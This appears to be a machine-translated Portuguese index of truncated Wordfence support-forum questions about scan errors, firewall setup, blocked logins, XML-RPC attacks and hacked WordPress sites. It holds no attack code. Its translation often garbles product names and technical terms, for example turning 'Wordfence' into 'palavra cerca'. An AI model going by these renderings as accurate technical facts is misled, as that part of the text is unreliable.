Um usuário perguntou ? Não consigo encontrar uma lista de resultados de verificação. Eu vejo onde diz que são 10, mas não há lista, nenhum botão, nada para me ajudar. Tudo o que você precisa fazer é “reparar” ou “destruir”. Eu não sei O QUE precisa ser corrigido ou removido. (@wfyann) 2 anos, 9 meses […]
Pergunta de segurança do WordPress Wordfence: violação de tempo limite de verificação
Um usuário perguntou ? Por que isso acontece todos os dias (Análise expirou)? O registro de atividades do Wordfence mostra: Verificação de interferência. 12.008 arquivos digitalizados, 32 plugins, 2 temas, 224 páginas, 0 comentários e 141.977 registros em 8 horas e 56 segundos Atualmente correção de palavras neste blog: 1.Scan arquivos fora de sua instalação […]
Pergunta de segurança do WordPress Wordfence: Falha na verificação ao se conectar aos servidores do Word
Um usuário perguntou ? Quando executo uma verificação palavra por palavra, recebo o seguinte erro: Erro de verificação concluída: Erro ao conectar-se aos servidores de verificação do Wordfence: erro cURL 35: erro de conexão SSL Eu tenho minha atualização do servidor da web openssl e curl para as versões mais recentes. Eles também verificaram se […]
WordPress Wordfence Pergunta de segurança: Problema de segurança: arquivo user.ini
Um usuário perguntou ? Visão: Por padrão, o arquivo user.ini é criado e contém a raiz do site no servidor. Isso pode permitir que hackers facilitem um ataque de travessia de diretório. (@wfasa) 3 anos, 4 meses atrás Oi David, O arquivo .user.ini é criado durante o processo de otimização do firewall. Ao mesmo tempo […]
Pergunta de segurança do WordPress Wordfence: Qual poderia ser a pior coisa que poderia acontecer se você tentasse bloquear tudo da AWS?
Um usuário perguntou ? Uma grande quantidade de tráfego bloqueado vem de servidores Amazon AWS. Existem pessoas legítimas que visitariam meu site a partir de um endereço IP da AWS? O que acontece se eu bloquear todos eles? (@mountainguy2) 2 anos, 6 meses atrás O pior que pode acontecer é que você provavelmente reduzirá o […]
Pergunta sobre a segurança do Wordfence do WordPress: Por que você continua alertando: arquivo desconhecido no coração do WordPress: wp-include/class.wp.php
Um usuário perguntou ? Eu uso a versão 4.8.2 do WordPress. A varredura continua avisando sobre isso Unknown file in WordPress core: wp-includes/class.wp.php Filename: wp-includes/class.wp.php File Type: Core Issue First Detected: 55 secs ago. Severity: Warning Status New This file is in a WordPress core location but is not distributed with this version of WordPress. […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence mostra logins de ID de usuário desconhecidos
Um usuário perguntou ? Olá Instalei recentemente o Wordfence no meu site depois de descobrir que ele foi hackeado. Posteriormente, recebi dois e-mails do Wordfence mostrando um login bem-sucedido de dois IDs de usuário desconhecidos. E, aparentemente, ambos os IDs tinham privilégios de administrador. Também verifiquei e descobri que o tema do meu site foi […]
Pergunta de segurança do WordPress Wordfence: Erro ao digitalizar palavras
Um usuário perguntou ? Olá, Quando executo uma verificação de palavras, recebo o seguinte erro: “Falha na verificação. A verificação não pôde ser iniciada. Isso geralmente acontece porque o site não consegue fazer uma solicitação de saída ou está bloqueado para se conectar a si mesmo. « Você tem alguma ideia? (@wfsupport) 2 anos, 7 […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence protege todos os sites, não apenas blogs
Um usuário perguntou ? Olá e obrigado por adicionar este plugin. Estou em roaming se houver alguma maneira de fazê-lo funcionar em todos os lugares. O WordPress está em uma pasta AAA, não em um índice. Então funciona perfeitamente. Index é um site php e não WordPress. Existe uma abordagem para fazê-lo funcionar e para […]
Pergunta sobre o Wordfence Security do WordPress: Word em várias redes
Um usuário perguntou ? Olá, Temos uma configuração de multi-rede WP onde sete (7) redes WP multi-site diferentes são configuradas e cada rede multilíngue tem um número diferente de substratos. Usando o plugin WP Multi Networks, todas as redes criadas ainda rodam com a mesma instalação WP e os mesmos plugins e temas; no entanto, […]
Pergunta de segurança do WordPress Wordfence: Word no BLOG hospedado
Um usuário perguntou ? Nosso site hospeda WordPress e hospeda um blog WP no site. Eles atualizaram recentemente seu PHP WP e agora nosso login está bloqueado. Consegui verificar o log e ver que nem o WordFence nem o assistente do WF estão disponíveis para edição. Devo ter o WordFence e o Assistente carregados? Eu […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence Live Traffic Log funcionando
Um usuário perguntou ? Nas últimas duas semanas, meu registro de tráfego ao vivo do Wordfence não está mantendo, bem, registrando, gravando talvez um ou dois acessos por dia e ignorando ou limpando outros acessos. Eu sei que isso está correto, pois tenho uma instalação separada do statcounter que está funcionando. No entanto, a revisão […]
WordPress Wordfence Pergunta de segurança: Onde está a palavra cerca de quarentena?
Um usuário perguntou ? Assunto: Atividade do Wordfence para 27 de abril de 2020 em Regra de jogo: Bloqueio de vírus Regra: Receptor do bloqueador de vírus: [email protected] Ação: Mover para a quarentena. Ação: Notificar [email protected] Informações de vírus: {HEX} Malware.Expert.malware.url.hastebin.com.0.UNOFFICIAL (clamav) Onde está a quarentena do wordfence no meu wp-admin? (@wfgerald) 8 meses, 3 […]
Pergunta sobre o Wordfence Security do WordPress: A tabela do Wordfence tem muitas camadas
Um usuário perguntou ? Ao executar um backup, vi este aviso no arquivo de log: 0018.621 (0) [Warning] A tabela wp_wfLeechers tem muitas camadas (234603); esperamos que sua empresa de hospedagem na web forneça recursos suficientes para despejar essa tabela no backup. Caso contrário, você precisará remover os dados desta tabela ou entrar em contato […]
Pergunta sobre o Wordfence Security do WordPress: É usado para filtrar listas de senhas em violações de dados
Um usuário perguntou ? Olá. Então, recebi esta mensagem depois de fazer login no meu site: Você está usando para filtrar listas de senhas em violações de dados. Que lista é essa? Minha senha não está no popular arquivo rockyou.txt. Eu sou muito sério sobre este assunto. Se realmente existe em uma lista de senhas […]
Pergunta sobre o Wordfence Security do WordPress: Seu acesso a este site está temporariamente restrito pelo proprietário do site.
Um usuário perguntou ? Como diabos meu senhorio conseguiu acesso limitado se eu sou o proprietário e gerente? E então ele diz: Se você acha que foi bloqueado por engano, entre em contato com o proprietário deste site para obter assistência. Então, entrei em contato e tentei desbloqueá-lo. Mas é claro que não posso fazer […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence v. SiteLock
Um usuário perguntou ? Olá! Quando comecei com sites WordPress, sabia que a segurança era muito importante. HostGator ofereceu uma solução de custo muito baixo no SiteLock. Então eu comprei. Então, enquanto construía o site, ouvi algumas coisas boas sobre o Wordfence, então instalei esse plugin também (ainda é a versão gratuita). Agora que descobri […]
Pergunta de segurança do WordPress Wordfence: SNAFU após a última atualização
Um usuário perguntou ? Não tenho mais comentários ao vivo e não consigo ver ou adicionar blocos. Acabei de atualizar para a versão mais recente. O plug-in agora está completamente sem uso. Também não consigo voltar para a versão anterior. Não consigo desligar o firewall ou fazer qualquer outra alteração no plugin. Você tem alguma […]
Pergunta sobre o Wordfence Security do WordPress: hourstafree.biz – Wordfence perdeu a injeção impertinente
Um usuário perguntou ? Um dos sites que cuidamos foi afetado pela injeção de código ruim em todo o site. Você inseriu um link javascript em um arquivo hospedado por hourstafree.biz O arquivo fez com que os visitantes do site fossem redirecionados para uma página que tenta instalar o plug-in do Chrome. O script adiciona […]
Pergunta de segurança do WordPress Wordfence: boca a boca com AWS Elastic Elastic Beans
Um usuário perguntou ? Olá, estou executando o WordPress no serviço “Elastic Beanstalk” da Amazon Web Service. É um site muito básico, portanto, o fluxo de trabalho atual é fazer alterações conforme necessário usando um painel padrão do WordPress e, em seguida, fazer periodicamente uma cópia de toda a instalação via FTP e carregá-la no […]
Pergunta sobre o Wordfence Security do WordPress: Deadlock recebeu um erro no banco de dados do WordPress ao tentar bloqueá-lo;
Um usuário perguntou ? [Mon Nov 25 09:37:00.557083 2019] [:error] [pid 1143] [client 10.0.203.4:10172] Deadlock recebeu um erro no banco de dados do WordPress ao tentar bloqueá-lo; tente reiniciar uma transação para uma consulta de atualização faro_options DEFINIR option_value = ‘a:40:{i:0; s:21: Estou recebendo uma pergunta de bloqueio, você pode verificar o que está errado […]
Pergunta de segurança do WordPress Wordfence: Comandos de erro do banco de dados do WordPress para informações;
Um usuário perguntou ? Olá a todos, qual poderia ser a causa dos seguintes comandos de erro de banco de dados do WordPress para obter informações? não é possível executar este comando agora para SELECT query *, CASE ‘ error em nosso log de erros? [04-Nov-2019 15:43:32 UTC] Comandos de erro do banco de dados […]
Pergunta sobre o Wordfence Security do WordPress: os arquivos principais do WordPress foram modificados
Um usuário perguntou ? Ele comete alguns erros estranhos ao modificar alguns arquivos WP principais. O suporte da Network Solutions disse que eu deveria alterá-los de volta ao que eram, mas estou um pouco relutante em fazê-lo. Alguma opinião sobre isso abaixo e devo pressionar “Fix” no Wordfence? Ou é malware? Arquivo principal modificado do […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence não detecta malware de servidor de widget
Um usuário perguntou ? Procurei o tópico aqui no fórum mas não encontrei nenhum resultado. O servidor de widgets de malware excluiu um blog meu e o Wordfence não conseguiu detectá-lo. WordPress e Wordfence estão atualizados. Eu apreciaria qualquer ajuda. Obrigado. (@wfdave) 2 anos, 1 mês atrás Olá @marcelotodaro, Você pode ir para Aparência -> […]
Pergunta de segurança do WordPress Wordfence: Problemas do Wordfence com o Pantheon Hosting
Um usuário perguntou ? Olá, Usamos Wordfence em todos os sites de nossos clientes. No entanto, esses sites têm algumas vulnerabilidades devido aos seguintes problemas entre o Wordfence e a hospedagem do Pantheon: Edição nº. Problema nº 1: habilitar o recurso de rastreamento de tráfego ao vivo no Wordfence envia cookies que são contrários ao […]
WordPress Pergunta de segurança do Wordfence: Imagens CSS do Wordfence jQuery-UI não encontradas
Um usuário perguntou ? Estou usando o Wordfence 7.0.5. Enquanto olhava para o Live Traffic, comecei a procurar entradas “404 Not Found” para arquivos de imagem em /wp-content/plugins/wordfence/css/images. Por exemplo, vejo entradas “404 Not Found” para /wp-content/plugins/wordfence/css/images/ui-icons_ec882f_256x240.png. O diretório css/images contém: ui-icons_222222_256x240.png ui-icons_cd0a0a_256x240.png ui-icons_fbe569_256x240.png ui-icons_fff_256x240.png Portanto, parece que você esqueceu de incluir esses ícones coloridos […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence + Jetpack
Um usuário perguntou ? Meu nome é G’day, Will e usamos seu plugin gratuito. Eu também uso Jetpack com Automattic, e eles possuem algumas medidas de segurança que podem ser habilitadas através do plugin. Portanto, não estou executando software duplicado na mesma tarefa, há algo que o Jetpack faz em sua versão gratuita que o […]
WordPress Wordfence Security Question: Word – aviso fopen no PHP 7.2
Um usuário perguntou ? Olá! Sou administrador de alguns sites WordPress e tenho o mesmo problema em todos eles relacionados ao Worfence versão 7.1.20, que roda no PHP 7.2 e cria um arquivo error_log em cada raiz ftp contendo a seguinte mensagem de erro: “Aviso do PHP: fopen(): https://folder está desabilitado na configuração do servidor […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence não detecta malware de servidor de widget
Um usuário perguntou ? Olá, parece haver algum malware no meu site, mas não consigo descobrir qual plugin está causando isso… Infelizmente, por mais que eu goste de uma palavra, ele também parece não saber… Pensamentos (@wfdave) Faz 2 anos Olá @spinal333, Você pode executar a seguinte consulta em seu banco de dados? UPDATE wp_posts […]
Pergunta sobre o Wordfence Security do WordPress: WordFence: erro cURL 60: SSL: nenhum certificado alternativo
Um usuário perguntou ? Oi pessoal Depois de mover meu site do meu próprio servidor freeBSD para um servidor virtual Linux em um serviço de hospedagem comercial, vejo o seguinte erro na conectividade de diagnóstico, vinculando de volta a esta parte do site. Falha ao testar wp_remote_post() neste servidor! A resposta foi: erro cURL 60: […]
Pergunta sobre o Wordfence Security do WordPress: o Wordfence falhou ao se registrar nos servidores de verificação do Wordfence quando ativado
Um usuário perguntou ? O Wordfence falhou ao se registrar nos servidores de verificação do Wordfence quando ativado. Você pode tentar corrigir esse problema desabilitando o Wordfence e, em seguida, habilitando-o novamente, para que o Wordfence comece a registrar para você. Se você mantiver esse erro visível, geralmente significa que seu servidor WordPress não pode […]
WordPress Pergunta de segurança do Wordfence: Atualizações do bloco do WordFence – 403 Proibido
Um usuário perguntou ? acabei de receber 403 Proibido Uma operação potencialmente insegura foi detectada em seu aplicativo neste site e foi bloqueada pelo Wordfence. Se você é um administrador e está convencido de que se trata de um falso positivo, você pode listar automaticamente essa solicitação e repetir a mesma ação. Ao testar 6 […]
Pergunta de segurança do WordPress Wordfence: Moz Tracker Word Blocker (rogerbot)
Um usuário perguntou ? Versão do WordPress: 5.2.4 Versão do Wordfence: 7.4.1 Eu tenho uma pergunta se o firewall do Wordfence está bloqueando o tráfego do rastreador Moz (rogerbot). Eu uso Wordfence e Moz em muitos sites e nunca foi um problema antes. Os detalhes da atividade estão abaixo: Dados de atividade Ashburn, EUA Crashed, […]
Pergunta sobre o Wordfence Security do WordPress: Wordfence bloqueou um registro de administrador
Um usuário perguntou ? Olá, O plugin Wordfence bloqueou minha conta de administrador. Quando completo um login e passo, recebo a mensagem: INSECURE PASSWORD: Sua tentativa de login foi bloqueada porque a senha que você está usando vazou nas listas de senhas em violações de dados. Os invasores usam essas listas para invadir sites maliciosos […]
Pergunta sobre o Wordfence Security pelo WordPress: Instalação do Wordfence e Rede / Multisite: Como usar
Um usuário perguntou ? Eu tenho o Wordfence instalado em uma instalação de rede/multilíngue do WordPress. Eu só vejo o Wordfence como uma opção ao visualizar o site como um painel de administração de rede. Eu entendo que o comportamento é esperado. Minha pergunta surge porque configurei minha rede multilíngue para trabalhar com domínios de […]
Pergunta sobre o Wordfence Security do WordPress: WP não suporta Wordfence e foi desativado automaticamente
Um usuário perguntou ? Ao fazer login no meu site WP, notei que o WordPress foi desativado por algum motivo. Quando faço uma tentativa reativa, recebo a notificação de erro “A palavra fence está desativada, plugins relacionados à ‘segurança’ podem prejudicar seu site ou criar problemas de desempenho para o seu site e NÃO são […]
Pergunta de segurança do WordPress Wordfence: A resposta não pode ser analisada” (NSURLErrorDomain: -1017)
Um usuário perguntou ? isso é uma questão de intervenção mas dor quando acontece! Eu estava escrevendo uma nova postagem no blog hoje e fui embora e quando voltei o erro “O Safari não pode carregar a página … não é possível analisar a resposta” (NSURLErrorDomain: -1017) O que diabos isso significa? Publiquei meu URL […]
Pergunta sobre o Wordfence Security do WordPress: [BUG] URLs em maiúsculas e minúsculas são proibidos.
Um usuário perguntou ? Olá Estou usando o recurso de URL banido do Wordfence o suficiente para impedir imediatamente que hackers acessem URLs indesejados. Hoje notei que os URLs inseridos na lista de URLs proibidos diferenciam maiúsculas de minúsculas. Por exemplo, se adicionarmos uma URL /phpmyadmin à lista e alguém tentar acessar uma URL /phpMyAdmin, […]
Pergunta sobre o Wordfence Security do WordPress: Não é possível conectar ao servidor
Um usuário perguntou ? Desde a atualização, estou recebendo esta mensagem de erro: O Wordfence não pôde se registrar nos servidores de verificação do Wordfence quando foi ativado. Você pode tentar corrigir esse problema desabilitando o Wordfence e, em seguida, habilitando-o novamente, para que o Wordfence o reinicie. Se você ver esse erro consistentemente, isso […]
Pergunta sobre o Wordfence Security do WordPress: Pergunta sobre ahrefs.com/robot/) & host.colocrossing.com
Um usuário perguntou ? Olá Gostaria de agradecer pelo seu plugin que ajuda a manter os vermes longe de alguns sites que gerencio. Eu tenho 2 perguntas: Este é “AhrefsBot/6.1; + Http://ahrefs.com/robot/)” parece estar permanentemente no comentário da live e não sou especialista nisso, mas tenho a impressão de que não há nada de bom […]
Pergunta de segurança do WordPress Wordfence: Conflito 2FA com o Dashlane
Um usuário perguntou ? Olá, Estou usando 2FA no meu site usando outro plugin (e funcionou bem). Acabei de usar a opção Wordfence 2FA. Mas estou tendo um problema com outro programa de senha chamado Dashlane. O Dashlane preenche automaticamente os campos de login e senha. No programa 2FA acima, você preencheria a página de […]
Pergunta sobre o Wordfence Security do WordPress: Ataque via xmlrpc.php
Um usuário perguntou ? Olá, obrigado pela excelente solução de segurança. e novamente XML-RPC! Apenas desabilitando o recurso de autenticação XML-RPC, o Wordfence impedirá qualquer ataque XML-RPC? Mas a cada minuto é feito um ataque via XML-RPC. Além disso, adicionando o código abaixo ao .htaccess, os ataques XML-RPC são completamente evitados: <Files xmlrpc.php> order deny,allow […]
Pergunta sobre o Wordfence Security do WordPress: Seu site foi rejeitado pelo navegador TOR
Um usuário perguntou ? Quando tento acessar um dos meus sites pelo navegador Tor, recebo esta mensagem. 403 Proibido O QUE? Porque estou vendo isso? Wordfence, um provedor de segurança, bloqueou seu acesso a este site, que protege os sites de atividades maliciosas. Se você acha que o Wordfence deve permitir que você acesse este […]
sem CSPRNG adequado
Para as duas últimas versões (?) Isso acontece na página de login após o envio dos dados de login (wp-login.php). WP 5.1.1 é devido ao antigo PHP 5.3.27 Exception thrown There is no suitable CSPRNG installed on your system Vou mudar para um servidor mais novo, mas enquanto isso só posso fazer login no gerenciador […]
Otimização do firewall wordfence para WordPress gerenciada pelo GoDaddy
Olá Talvez eu seja apenas um novato e eu realmente não entendo os ins e outs, mas eu estou tentando otimizar o firewall do Wordfence e eu não posso obtê-lo cabeça ou cauda. Tenho o WordPress gerenciado pelo GoDaddy e o CPanel não é uma opção. Não consigo encontrar o caminho via FTP. As pesquisas […]
Mais problemas de backup
Hoje, tenho dois (uma atualização, três agora) dos meus sites relatando um problema com o Backup Buddy que não pode completar seus backups completos confiáveis. Olhando para os registros, você tem problemas com as tabelas no banco de dados wordfence, especificamente… Error #857835: Unable to get table creation SQL for tablewp_wfhoover. Resultado: 1. Confirme se […]
Otimizando o firewall de wordfence
No entanto, se eu recebi uma mensagem antes dos servidores DNS terem mudado, todos eles parecem bons, mas eu tenho uma mensagem para otimizar o firewall do aplicativo web Wordfence que eu fiz anteriormente quando instalei o Wordfence. Olhando para esta mensagem, eu vejo um caminho para o arquivo, mas eu não reconheço esse caminho […]
Verificação da versão OpenSSL?
Também recebi toda a mensagem de que o Openssl é velho. E se eu não atualizá-lo? O Wordfence vai parar de funcionar? Além disso, o WF diz que estou executando a versão 0.9.8zc, mas quando eu verificar o meu servidor é 1.0.1l como mostrado aqui: bash-3.2 # / usr / bin / openssl versão OpenSSL […]
Hack Pharma
Um usuário perguntou Olá! O site anterior era um dos muitos (o mesmo provedor) chamado “Pharma Hack” (https://www.malcare.com/blog/what-is-pharma-hack-how-to-clean-it/) Em cada página e postagem você pode ver JavaScript no início e no final e no meio do texto francês vendendo viagra. Como é possível que o site tenha sido hackeado mesmo que eu use Wodfence? Wordfence […]
Impedir que os usuários não se registrem com o nome de usuário ‘administrador’?
Um usuário perguntou Olá, um usuário colaborador pode se registrar com um nome de usuário do administrador, embora esta opção seja “Impedir que os usuários registrem um nome de usuário ‘administrador’ se ele não existir”. (Eu já lhe enviei um cheque.) Então isso significa que não funciona? (@wfasa) 2 anos, 1 mês atrás Olá @ […]
phpinfo() é exibido após o login
Um usuário perguntou Usando o Wordfence Ver 7.1.15 Em uma instalação, phpinfo() é exibido imediatamente após um usuário ter logado com sucesso. Não quero que isso aconteça. Identifiquei o código responsável em plugins / wordfence / lib / menu_tools_diagnostic.php: <?php if (!empty($inEmail)): ?> <?php phpinfo(); ?> <?php endif ?> Não sei por que esse código […]
Solicitar informações bloqueadas de IP (googleusercontent.com)
Um usuário perguntou O comentário ao vivo me informa hoje que bloqueei este ip 35.239.244.22 (anexado na tela: https://ibb.co/fC8Mm26 ). Agora bloqueei-o permanentemente. Vejo que se refere a googleusercontent.com. Fiz bem em bloqueá-lo permanentemente? Foi uma tentativa de hackear meu site? Obrigado. (@wfgerald) 7 meses, 4 semanas atrás Olá @ calle81, Não acho que seja […]
regras de limite de memória.php
Um usuário perguntou Quando tento carregar uma ciclovia gpx usando o plugin WP GPX, o seguinte erro aparece: Erro fatal: tamanho da memória permitido 134217728 bytes esgotados (tentei alocar 35367577 bytes) em /wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php on-line 1600 Existe uma maneira de aumentar o limite de palavras? Lembre-se: 107,5 por 256 MB (42%) | WP LIMITADO: 40 MB […]
Problemas com xml-rpc.php
Um usuário perguntou Após a última atualização, ninguém mais pode usar o Open Live Writer! Uma grande conquista! Método metaWeblog.newPost inválido recebido do servidor do blog Inválido: Documento de resposta inválido devolvido pelo servidor XmlRpc Documento de resposta inválido retornado pelo servidor XmlRpc -> System.Xml.XmlException: Inesperado XML commit. A declaração XML deve ser o primeiro […]
Configurações patchman marcadas como arquivo modificado
Um usuário perguntou Recebi um aviso da minha empresa de hospedagem sobre uma grave falha de segurança no WordPress 4.11. O Patchman forneceu um backend de uma correção wordpress 5.2.3 que afetou quatro arquivos no núcleo WordPress. O WordFence detectou atualizações do Patchman e é relatado como uma mudança de arquivo principal do WordPress. Acho […]
Evite aviso PHP: Tempo de arquivo (): Erro de estatística
Um usuário perguntou Ei Eu fico de olho no meu servidor de produção sobre registros de erros php. Wordfence mantém esta saída única: PhP Aviso: filemtime(): falha estatística para… / public_html / wp-content / tema / mytheme / .ea-php-cli.cache i… / public_html / wp-content / plugins / wordfence / lib / wfActivityReport.php on-line 672 Esse […]
A página contém uma URL de malware suspeita: Home
Um usuário perguntou Olá, eu escaneei meu site com um plugin Wordfence, que diz… A URL desta página está atualmente na lista negra do domínio Wordfence. A URL é: eu removo essa URL de malware. Ele está em uma situação crítica. Responder (@wfgerald) há 1 ano Olá @ rajatsundriyal1, Infelizmente, seu site parece estar comprometido. […]
Erro php de wordfence para $HTTP_RAW_POST_DATA?
Um usuário perguntou Eu recebo isso no meu registro de erro PHP: PHP obsoleto: $HTTP_RAW_POST_DATA não é concluído automaticamente e será excluído em uma versão futura. Para evitar este aviso, defina ‘always_populate_raw_post_data’ para ‘-1’ em php.ini e use o fluxo de entrada php: // em vez disso. em Desconhecido Online 0 Procurei por software de […]
Mensagem PHP: Intertravar erro do banco de dados WordPress encontrado ao tentar obter acidente
Um usuário perguntou Estou tentando resolver esse problema no meu site sem sorte. Estou usando o WordFence e quando o desligo, o erro desaparece. Desabilitei o plugin removendo-o completamente e reinstalando-o novamente, mas o erro aparece toda vez que o reinstalo. Por favor, note que eu tenho o plugin totalmente instalado conforme recomendado pelo WordFence. […]
Erro de análise do PHP: erro de sintaxe, fim inesperado do arquivo
Um usuário perguntou Olá equipe, Embora este erro tenha aparecido no Check My Error Log: Erro fatal php: exceção sem suporte ‘wfWAFStorageFileException’ com a mensagem ‘Incapaz de verificar o conteúdo do arquivo temporário para gravação atômica’. em.. /public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php:46 Stack track: # 0 .. /public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php(567): wfWAFStorageFile :: atomicFilePutContents (‘…’, ‘ #1 [função interna]: wfWAFStorageFile-> saveConfig() #2 […]

Pergunta de segurança do WordPress Wordfence: Muito difícil limitar facebookexternalhit